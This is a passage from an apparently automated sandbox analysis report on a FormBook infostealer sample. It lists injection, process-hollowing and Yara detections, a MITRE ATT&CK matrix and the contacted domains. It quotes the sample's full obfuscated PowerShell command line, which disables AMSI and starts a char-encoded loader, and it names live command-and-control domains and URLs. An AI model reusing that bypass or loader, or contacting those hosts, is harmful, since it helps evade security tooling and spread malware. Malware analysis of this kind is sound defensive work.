          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeCode function: 1_2_00401180 Sleep,Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,Sleep,exit,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.130 80
          Source: C:\Windows\explorer.exeDomain query: www.strawberrylinebikehire.com
          Source: C:\Windows\explorer.exeDomain query: www.rajuherbalandspicegarden.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 1F0000
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 2BC5008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: explorer.exe, 0000000A.00000000.304127753.00000000089FF000.00000004.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000A.00000000.315976236.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Query Registry1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter21Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncSystem Information Discovery111Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452684 Sample: s2rsXUiUn8 Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 google.com 2->35 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 4 other signatures 2->57 12 s2rsXUiUn8.exe 1 2->12         started        signatures3 process4 signatures5 69 Obfuscated command line found 12->69 71 Very long command line found 12->71 15 powershell.exe 31 12->15         started        19 conhost.exe 12->19         started        process6 dnsIp7 43 cdn.discordapp.com 162.159.134.233, 443, 49711 CLOUDFLARENETUS United States 15->43 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->45 47 Writes to foreign memory regions 15->47 49 Injects a PE file into a foreign processes 15->49 21 calc.exe 15->21         started        signatures8 process9 signatures10 59 Modifies the context of a thread in another process (thread injection) 21->59 61 Maps a DLL or memory area into another process 21->61 63 Sample uses process hollowing technique 21->63 65 2 other signatures 21->65 24 explorer.exe 21->24 injected process11 dnsIp12 37 rajuherbalandspicegarden.com 192.185.17.130, 49724, 80 UNIFIEDLAYER-AS-1US United States 24->37 39 www.strawberrylinebikehire.com 24->39 41 www.rajuherbalandspicegarden.com 24->41 67 System process connects to network (likely due to code injection or exploit) 24->67 28 help.exe 24->28         started        signatures13 process14 signatures15 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 1 28->31         started        process16 process17 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          s2rsXUiUn8.exe20%MetadefenderBrowse
          s2rsXUiUn8.exe57%ReversingLabsWin64.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.calc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.homekeycap.com/pjje/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          google.com
          216.58.215.238
          truefalse
            high
            cdn.discordapp.com
            162.159.134.233
            truefalse
              high
              rajuherbalandspicegarden.com
              192.185.17.130
              truetrue
                unknown
                www.strawberrylinebikehire.com
                unknown
                unknowntrue
                  unknown
                  www.rajuherbalandspicegarden.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcHtrue
                    • Avira URL Cloud: safe
                    unknown
                    www.homekeycap.com/pjje/true
                    • Avira URL Cloud: safe
                    low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designersGexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                              high
                              http://www.tiro.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                high
                                http://www.goodfont.co.krexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comlexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.typography.netDexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
